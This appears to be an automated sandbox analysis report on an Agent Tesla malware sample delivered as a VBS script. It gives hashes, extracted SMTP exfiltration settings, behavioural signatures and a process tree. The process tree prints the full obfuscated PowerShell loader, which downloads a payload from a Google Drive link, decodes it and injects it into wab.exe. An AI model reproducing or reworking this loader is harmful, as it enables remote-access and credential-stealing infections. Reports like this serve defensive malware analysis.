Analysis
-
max time kernel
147s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
18-06-2024 09:36
Static task
static1
Behavioral task
behavioral1
Sample
STS_Bunker_00617.vbs
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
STS_Bunker_00617.vbs
Resource
win10v2004-20240508-en
General
-
Target
STS_Bunker_00617.vbs
-
Size
92KB
-
MD5
dfe2a23100ac3263583e69f48e9b32e6
-
SHA1
20087641aba69eaaaef0f87a7d21edd8a255db60
-
SHA256
9aa64f43d090ff657848da74a0c2ea1f3211fa1d88ac3fa603e65d724360a957
-
SHA512
48b5bf8605415ead17d375adc9613b73f8e3f80132086f2a3ef11df7684e1d43ad4f97aee65967986a9964d81edcd7043d7faaf720fcd1f73052411d43153038
-
SSDEEP
1536:V01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5eW8VLOExkzL:V09LB0DnWzhX7RXaSMxhxsAhWEwhrdMh
Malware Config
Extracted
agenttesla
Protocol: smtp- Port:
587 - Username:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 3 2828 powershell.exe 5 2828 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 12 api.ipify.org 13 api.ipify.org 14 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 596 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2756 powershell.exe 596 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2756 set thread context of 596 2756 powershell.exe wab.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 2828 powershell.exe 2756 powershell.exe 2756 powershell.exe 596 wab.exe 596 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeDebugPrivilege 596 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 2996 wrote to memory of 2828 2996 WScript.exe powershell.exe PID 2996 wrote to memory of 2828 2996 WScript.exe powershell.exe PID 2996 wrote to memory of 2828 2996 WScript.exe powershell.exe PID 2828 wrote to memory of 1604 2828 powershell.exe cmd.exe PID 2828 wrote to memory of 1604 2828 powershell.exe cmd.exe PID 2828 wrote to memory of 1604 2828 powershell.exe cmd.exe PID 2828 wrote to memory of 2756 2828 powershell.exe powershell.exe PID 2828 wrote to memory of 2756 2828 powershell.exe powershell.exe PID 2828 wrote to memory of 2756 2828 powershell.exe powershell.exe PID 2828 wrote to memory of 2756 2828 powershell.exe powershell.exe PID 2756 wrote to memory of 2700 2756 powershell.exe cmd.exe PID 2756 wrote to memory of 2700 2756 powershell.exe cmd.exe PID 2756 wrote to memory of 2700 2756 powershell.exe cmd.exe PID 2756 wrote to memory of 2700 2756 powershell.exe cmd.exe PID 2756 wrote to memory of 596 2756 powershell.exe wab.exe PID 2756 wrote to memory of 596 2756 powershell.exe wab.exe PID 2756 wrote to memory of 596 2756 powershell.exe wab.exe PID 2756 wrote to memory of 596 2756 powershell.exe wab.exe PID 2756 wrote to memory of 596 2756 powershell.exe wab.exe PID 2756 wrote to memory of 596 2756 powershell.exe wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle 1 "cls;$Scrotums = 1;$Bruta='ring';$Beelzebub='S';Function gigged($Gladden){$Hejsevrkets=$Gladden.Length-$Scrotums;$Maksimumstraffene=$Beelzebub+'ubst'+$Bruta;For( $Subarachnoidean=7;$Subarachnoidean -lt $Hejsevrkets;$Subarachnoidean+=8){$Brandering+=$Gladden.$Maksimumstraffene.Invoke( $Subarachnoidean, $Scrotums);}$Brandering;}function Alcaldes($Allograft){ . ($Afkortersav) ($Allograft);}$Mobilianer=gigged ' GetlinMLegitimo KobberzAkkill iAmadeuslYnkentrlTankrenaInforma/Styrtet5Trlkvin.Program0boy.ele Tinklin(bogudlaWTrykkeri SvmmehnDiskogrd kursisoAnabataw hotinisLejespa SkulptrNVermeskTNuancin comeba1Misdan 0mosel.v.Afklaps0B,kning;M.ggede filmkonW BilagsiSynartenDisinsu6 Ydervg4Cad.ish;Mate ia SengelxCata an6Usasunf4 Tempel;Papirar LycopsirSymmetrve dyson:Electre1 Coron 2Overswe1 T,unch.Afflict0,tivels)Inrig,e PrdispoGKaerligeScourwec InterckSov reioSulphet/Parison2 Wristb0Corn,ra1Skvadre0Unbehel0Be.gqvi1fack.ns0 Flagar1Termins Salg arF .orsttiTeko.perSheik reCoynessfWrongs,oIntercaxM,linge/ Ejendo1 Grinn,2Herutde1 Bldt.a. Jaunti0pachyhe ';$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';$Hovedindgange=gigged 'Trimpreh P ojektmoonseetOver,lopAbdicers Udsu,e: Gatewo/ nfluer/ReklapsdEfter krOnio.skiFlgesedvU,mgngeeEtheri . LaplangPsykt.roCrabieroJewfishg VilloslCamoudieOceanw .FuscindcInactivoBetul.nmB.landr/ mul,iluPretenccPerikon?InsolubeAlcoholxAppendipRaceforolidokilrDopingdtLagerfo=,alrensd Bilf,boHjortetw ,uadranGodsendlSlvvrdioSees,wsaBittingdSerarh &OnonisviBrsspekdGavlvgg=Slu.bet1JustifiE Gan.hil .etallVgrfter,L S,adsa3SocialvptrinelycBlainsgSvagin,cdM,rsomefFremmanmUnoxidioHenkastM Popk mn witt.dWMakvr.eJSup.ame2Opsmnin- .ariferSlentre9papegjebpneumon- HarpikHPinballe Picks WSprogbat JapygiFR dningCStampubtdeoxi,aZNonio,i5,ibrere_Unscrut ';$Flyvevaabnet=gigged ' Dutch >Ph.toet ';$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';$Behagelige='Epithecium';$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';Alcaldes (gigged ' ransfu$S,uglergAnorectlAgustemoconfuteb mutilaaAnhidrolVari bi: Hygsombunconsiy,emaaregPolkaernSkatkamiF.lmfornRestitugGri,hcrsDknavnerS rkproeTremmefgTangydilNsensabeDissimimSp,inkleFoelgenn HeltaltProbosceGrammatrUnarmednStrm.ore ChagrisLibert,=Virkeli(Guldf,sc tricy mRespittdPenname Dressi/PhysiotcPoin el Hvordan$ O,tpreK Impl,ar Disambi Don.tigSphenopsAmbulansUnthin,iYouthprtSlangetudioptraaUdtolketLikvidei ulfoetoSemifasn SteeraeovergesnIntranssFornrme)Dippene ');Alcaldes (gigged ' Parket$t rottlgForhandlTubfulsoBre dbobHer,kera ReprovlU,demon:ti,blivSAnskaf.pJernsbeeSen.elljSnoretrlEl iptikFactoria Jarid.bEcrufariu viklen ulfilmeThallict agfrertTidtag,e OrganorBalstyrn UnpropeDaybreasamurc.s=produkt$NonexclHskyldfloskyttegvBesk kkeBlas ogd NglelniEks,mennHmskodidCellulogAdfr,svaBov risnKoordingAvisereeFunktio.SquushisAk ariepSpejlgllOxyrhyniTaxamettForraad(Forehol$Tilv,jeF nitchilviderefyunderbuvBadevaneAr.angev Ro.aada Proctoareattirb S,ordrnIsohexyeTerroritAfhu,ni) Xanth. ');Alcaldes (gigged 'Chromop[ forpurNKom ureeRaakuldtInterre..epatomSL.calizeReteachrAffrontvHavnelbiRespecicp.rsonkeSipli.gPBalmorao J.rdvoiGuldfisnForkleltPlanlgnM Udkasta QuinibnSkeforsa eltiekgHysteroeM crolirOvertrk]Angreso:Alalusp:WudvagiSComprize Sc.phocSlappesuSclerotrMrk,ligiHandelst noneluyUndisobPBar iesrChaiseloSan,arat GrundfoLegehusc Oc.locoHyperpelAu,oinf noninfe=spagnuo Designv[UnpieceNpro euce S anestWorkpa...unicidSTushesse Deossic kiddoouCentralrUltima,iGulvtpptLuce.esyGnuerneP ,ubocarHijackeo KolonitHusl,jeoDomingtcMetermaoA,aiterlAfskrmnTbryllupyFranskmpTransube,laceab]Bag.ind: Phon.m:unipolrTJallsudlIsotopys,ompost1Palaeop2Overo.h ');$Hovedindgange=$Spejlkabinetternes[0];$Seducer223= (gigged 'Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt');$Seducer223+=$bygningsreglementernes[1];Alcaldes ($Seducer223);Alcaldes (gigged ' romeme$PikningtKrigs,jeSpurreysBerndhut komplesAfmejesiFemor,cgPublicenSjlcomiaGibli.il Pickee.Struct.H AshmaneDomest,aTudendedBandaiteAgrodolrSalpe esJydepot[Oliv ri$DaftarpROino hoePrepdmitBogsamluscampinrLev ringFlobprooSyndsfodU.foressVarmep,eGhandictButt.rc]Trosive=D,walki$demoph MFabriksoSynkrotbMoolvieiProton,lSkoleraiSkurkesaKarak,enVerbalieDownstrrUnvola. ');$Lysregulering183=gigged ' ,gbomb$CajussutPerfecteRecensisBedsid tbe olknsrickettiMo.genfgBellmounBeramunamdomtollEjstrup. MachaiDUgestemoPyrophowSkandinnBilledflPrespecoProdu,taUn,arbldLysenehFReaumuriJazz,edlSandhedeObjektk(Tyredes$Sheri tHSi.kesnoVoldsomvNotedeseObtusildUpmounti nviolenTeledusdSpejlengButinfoa Hebre nUnfrolig OmstteeSnowsto, whigov$OfferlaR S,inulo N.nresuNonselegEburniahWo,ennehUligevgoForsideuKkkenmasDispurpe UdtalesForvari)Unp.rce ';$Roughhouses=$bygningsreglementernes[0];Alcaldes (gigged 'Overana$CreedalgIndkrsulFngetreoExcu atbSph.ngoa Hemoprl .hurch:TvrskibUClarisanfrontsoc Ro.anfu Fejl.arMeridiosRawishdiCatchxen larg sgPsychot=Bevari,( hysicT Las.voeFemogtyshakkekdt noreks-GkkensjPGraenseaViceco.t IldspahForklar byplads$DomssagR NordfaoSprjtehuProle ogProletahB,andymhPerspekoTopviewuArm.tols Angol.e Efte,ksprete,d) Termin ');while (!$Uncursing) {Alcaldes (gigged ' Rekt.o$ ,estilgStbeforlfl,gdagoArchsteb LaboraaAdoptiolKrystal:Lo,lygaOUnrot,npCognisilIrrestri Sel.erv Uforsvn,ondekniSi.kerhnFortrolgForme ns Romeos=Fry eli$KnoldentgardwurrTelefonu.lowshoeSili,ot ') ;Alcaldes $Lysregulering183;Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');Alcaldes (gigged ' Unwave$Negering.yggelilStinashoPe.sonabvi,jestaTerephtlPassan,:PaakldnUHjemka,nStrkbancrestlaguTtskrevrSummetosSkftni,iOmgaaelnAbscissg,rester=Astroph(Dyrek,eT KeelfaeOutd,insDesinfetOctod,c-Possi,lPUncomp,aLoasacetReklamehJournal Gen.pbl$MarplotRSubdir.oModbrplu Diri egUnlashehHoldundhTudkoppo FormasuHemimors FunktieGehngsos Hanker)Silicle ') ;Alcaldes (gigged 'S,rhatu$PugilisgPruderelVicuallo,rigittbSchokkeaTerti.mlPiedtak:hygiejnB wagnerrPolygonaAspargenEuroviscNovatiohD,ostyleRecipierDowieisnEnnoblee Epapop=Mafiam,$,ybdebogFusionslHandlinoFeltworbSmugkr aGluco ilKnoppen:KompottRCostbeneequalsiv Udlg.eoFenacetlPredetau VirtuatOverlbsijustifioTidenden Acat aiAdminisz B,drageInsa iemSanidineGra ddanLykkeskt ,harcusTar squ+Hostile+Fartjsf%Nyintro$ SidehnSElannorpTyrestaeVr.sttej .etninlFouragekForkbsraDesti eb UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"3⤵PID:1604
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Scrotums = 1;$Bruta='ring';$Beelzebub='S';Function gigged($Gladden){$Hejsevrkets=$Gladden.Length-$Scrotums;$Maksimumstraffene=$Beelzebub+'ubst'+$Bruta;For( $Subarachnoidean=7;$Subarachnoidean -lt $Hejsevrkets;$Subarachnoidean+=8){$Brandering+=$Gladden.$Maksimumstraffene.Invoke( $Subarachnoidean, $Scrotums);}$Brandering;}function Alcaldes($Allograft){ . ($Afkortersav) ($Allograft);}$Mobilianer=gigged ' GetlinMLegitimo KobberzAkkill iAmadeuslYnkentrlTankrenaInforma/Styrtet5Trlkvin.Program0boy.ele Tinklin(bogudlaWTrykkeri SvmmehnDiskogrd kursisoAnabataw hotinisLejespa SkulptrNVermeskTNuancin comeba1Misdan 0mosel.v.Afklaps0B,kning;M.ggede filmkonW BilagsiSynartenDisinsu6 Ydervg4Cad.ish;Mate ia SengelxCata an6Usasunf4 Tempel;Papirar LycopsirSymmetrve dyson:Electre1 Coron 2Overswe1 T,unch.Afflict0,tivels)Inrig,e PrdispoGKaerligeScourwec InterckSov reioSulphet/Parison2 Wristb0Corn,ra1Skvadre0Unbehel0Be.gqvi1fack.ns0 Flagar1Termins Salg arF .orsttiTeko.perSheik reCoynessfWrongs,oIntercaxM,linge/ Ejendo1 Grinn,2Herutde1 Bldt.a. Jaunti0pachyhe ';$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';$Hovedindgange=gigged 'Trimpreh P ojektmoonseetOver,lopAbdicers Udsu,e: Gatewo/ nfluer/ReklapsdEfter krOnio.skiFlgesedvU,mgngeeEtheri . LaplangPsykt.roCrabieroJewfishg VilloslCamoudieOceanw .FuscindcInactivoBetul.nmB.landr/ mul,iluPretenccPerikon?InsolubeAlcoholxAppendipRaceforolidokilrDopingdtLagerfo=,alrensd Bilf,boHjortetw ,uadranGodsendlSlvvrdioSees,wsaBittingdSerarh &OnonisviBrsspekdGavlvgg=Slu.bet1JustifiE Gan.hil .etallVgrfter,L S,adsa3SocialvptrinelycBlainsgSvagin,cdM,rsomefFremmanmUnoxidioHenkastM Popk mn witt.dWMakvr.eJSup.ame2Opsmnin- .ariferSlentre9papegjebpneumon- HarpikHPinballe Picks WSprogbat JapygiFR dningCStampubtdeoxi,aZNonio,i5,ibrere_Unscrut ';$Flyvevaabnet=gigged ' Dutch >Ph.toet ';$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';$Behagelige='Epithecium';$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,epTalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac nProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end& Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';Alcaldes (gigged ' ransfu$S,uglergAnorectlAgustemoconfuteb mutilaaAnhidrolVari bi: Hygsombunconsiy,emaaregPolkaernSkatkamiF.lmfornRestitugGri,hcrsDknavnerS rkproeTremmefgTangydilNsensabeDissimimSp,inkleFoelgenn HeltaltProbosceGrammatrUnarmednStrm.ore ChagrisLibert,=Virkeli(Guldf,sc tricy mRespittdPenname Dressi/PhysiotcPoin el Hvordan$ O,tpreK Impl,ar Disambi Don.tigSphenopsAmbulansUnthin,iYouthprtSlangetudioptraaUdtolketLikvidei ulfoetoSemifasn SteeraeovergesnIntranssFornrme)Dippene ');Alcaldes (gigged ' Parket$t rottlgForhandlTubfulsoBre dbobHer,kera ReprovlU,demon:ti,blivSAnskaf.pJernsbeeSen.elljSnoretrlEl iptikFactoria Jarid.bEcrufariu viklen ulfilmeThallict agfrertTidtag,e OrganorBalstyrn UnpropeDaybreasamurc.s=produkt$NonexclHskyldfloskyttegvBesk kkeBlas ogd NglelniEks,mennHmskodidCellulogAdfr,svaBov risnKoordingAvisereeFunktio.SquushisAk ariepSpejlgllOxyrhyniTaxamettForraad(Forehol$Tilv,jeF nitchilviderefyunderbuvBadevaneAr.angev Ro.aada Proctoareattirb S,ordrnIsohexyeTerroritAfhu,ni) Xanth. ');Alcaldes (gigged 'Chromop[ forpurNKom ureeRaakuldtInterre..epatomSL.calizeReteachrAffrontvHavnelbiRespecicp.rsonkeSipli.gPBalmorao J.rdvoiGuldfisnForkleltPlanlgnM Udkasta QuinibnSkeforsa eltiekgHysteroeM crolirOvertrk]Angreso:Alalusp:WudvagiSComprize Sc.phocSlappesuSclerotrMrk,ligiHandelst noneluyUndisobPBar iesrChaiseloSan,arat GrundfoLegehusc Oc.locoHyperpelAu,oinf noninfe=spagnuo Designv[UnpieceNpro euce S anestWorkpa...unicidSTushesse Deossic kiddoouCentralrUltima,iGulvtpptLuce.esyGnuerneP ,ubocarHijackeo KolonitHusl,jeoDomingtcMetermaoA,aiterlAfskrmnTbryllupyFranskmpTransube,laceab]Bag.ind: Phon.m:unipolrTJallsudlIsotopys,ompost1Palaeop2Overo.h ');$Hovedindgange=$Spejlkabinetternes[0];$Seducer223= (gigged 'Benaadn$ Tu.vedgBeake.zlUngridhoHanekrobblreb gaAfskedslMi.vsan:f.ntasitPr surmeStratifsReuttert SeriogsSh.lteriOpliverg Se,ncinforskrea Nonoptl Regelf= StopmtNKopierieadminicwFeriebo-FluoromOVo.rloobBadsdirjBrilleneRebbenecLykkelit Ludfat D sertiSdemicriyVandrinsSkri eatBl.delseAandsv m M.ondo. SejlfrNTilendee DraftetStrangu.Renum eWUnionizeKamt.kkbAnsatssCP asoidlCa pereiK rolineOsteoidnGinghamt');$Seducer223+=$bygningsreglementernes[1];Alcaldes ($Seducer223);Alcaldes (gigged ' romeme$PikningtKrigs,jeSpurreysBerndhut komplesAfmejesiFemor,cgPublicenSjlcomiaGibli.il Pickee.Struct.H AshmaneDomest,aTudendedBandaiteAgrodolrSalpe esJydepot[Oliv ri$DaftarpROino hoePrepdmitBogsamluscampinrLev ringFlobprooSyndsfodU.foressVarmep,eGhandictButt.rc]Trosive=D,walki$demoph MFabriksoSynkrotbMoolvieiProton,lSkoleraiSkurkesaKarak,enVerbalieDownstrrUnvola. ');$Lysregulering183=gigged ' ,gbomb$CajussutPerfecteRecensisBedsid tbe olknsrickettiMo.genfgBellmounBeramunamdomtollEjstrup. MachaiDUgestemoPyrophowSkandinnBilledflPrespecoProdu,taUn,arbldLysenehFReaumuriJazz,edlSandhedeObjektk(Tyredes$Sheri tHSi.kesnoVoldsomvNotedeseObtusildUpmounti nviolenTeledusdSpejlengButinfoa Hebre nUnfrolig OmstteeSnowsto, whigov$OfferlaR S,inulo N.nresuNonselegEburniahWo,ennehUligevgoForsideuKkkenmasDispurpe UdtalesForvari)Unp.rce ';$Roughhouses=$bygningsreglementernes[0];Alcaldes (gigged 'Overana$CreedalgIndkrsulFngetreoExcu atbSph.ngoa Hemoprl .hurch:TvrskibUClarisanfrontsoc Ro.anfu Fejl.arMeridiosRawishdiCatchxen larg sgPsychot=Bevari,( hysicT Las.voeFemogtyshakkekdt noreks-GkkensjPGraenseaViceco.t IldspahForklar byplads$DomssagR NordfaoSprjtehuProle ogProletahB,andymhPerspekoTopviewuArm.tols Angol.e Efte,ksprete,d) Termin ');while (!$Uncursing) {Alcaldes (gigged ' Rekt.o$ ,estilgStbeforlfl,gdagoArchsteb LaboraaAdoptiolKrystal:Lo,lygaOUnrot,npCognisilIrrestri Sel.erv Uforsvn,ondekniSi.kerhnFortrolgForme ns Romeos=Fry eli$KnoldentgardwurrTelefonu.lowshoeSili,ot ') ;Alcaldes $Lysregulering183;Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');Alcaldes (gigged ' Unwave$Negering.yggelilStinashoPe.sonabvi,jestaTerephtlPassan,:PaakldnUHjemka,nStrkbancrestlaguTtskrevrSummetosSkftni,iOmgaaelnAbscissg,rester=Astroph(Dyrek,eT KeelfaeOutd,insDesinfetOctod,c-Possi,lPUncomp,aLoasacetReklamehJournal Gen.pbl$MarplotRSubdir.oModbrplu Diri egUnlashehHoldundhTudkoppo FormasuHemimors FunktieGehngsos Hanker)Silicle ') ;Alcaldes (gigged 'S,rhatu$PugilisgPruderelVicuallo,rigittbSchokkeaTerti.mlPiedtak:hygiejnB wagnerrPolygonaAspargenEuroviscNovatiohD,ostyleRecipierDowieisnEnnoblee Epapop=Mafiam,$,ybdebogFusionslHandlinoFeltworbSmugkr aGluco ilKnoppen:KompottRCostbeneequalsiv Udlg.eoFenacetlPredetau VirtuatOverlbsijustifioTidenden Acat aiAdminisz B,drageInsa iemSanidineGra ddanLykkeskt ,harcusTar squ+Hostile+Fartjsf%Nyintro$ SidehnSElannorpTyrestaeVr.sttej .etninlFouragekForkbsraDesti eb UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"4⤵PID:2700
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:596
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD542f4cdaff599bf751294f7772ef38470
SHA122d0b54450fb80f14860ffa415c5d0b2d1074a3b
SHA2562a8488b7b6eb1ce9702c196531a0335c9b399960f5d0d3f6892f87ef6d3f743a
SHA51245edd484ada632eba0d48a716a591d975f9ad6d414faa6a996e09f810d06a5234d2dcd28ff49e3b8e96133e815f86e681f66b66cdb648461f8ce6a53b056a74c
-
Filesize
3KB
MD5ea02db7340e3f6e6b8e17308b6557be3
SHA14dded0ce59ba5daea1945ed6c818139aaf87478d
SHA2567dce804a8697a14a7a3f373b752d8c27cfae9f594620cfb5b67a362d5f227a33
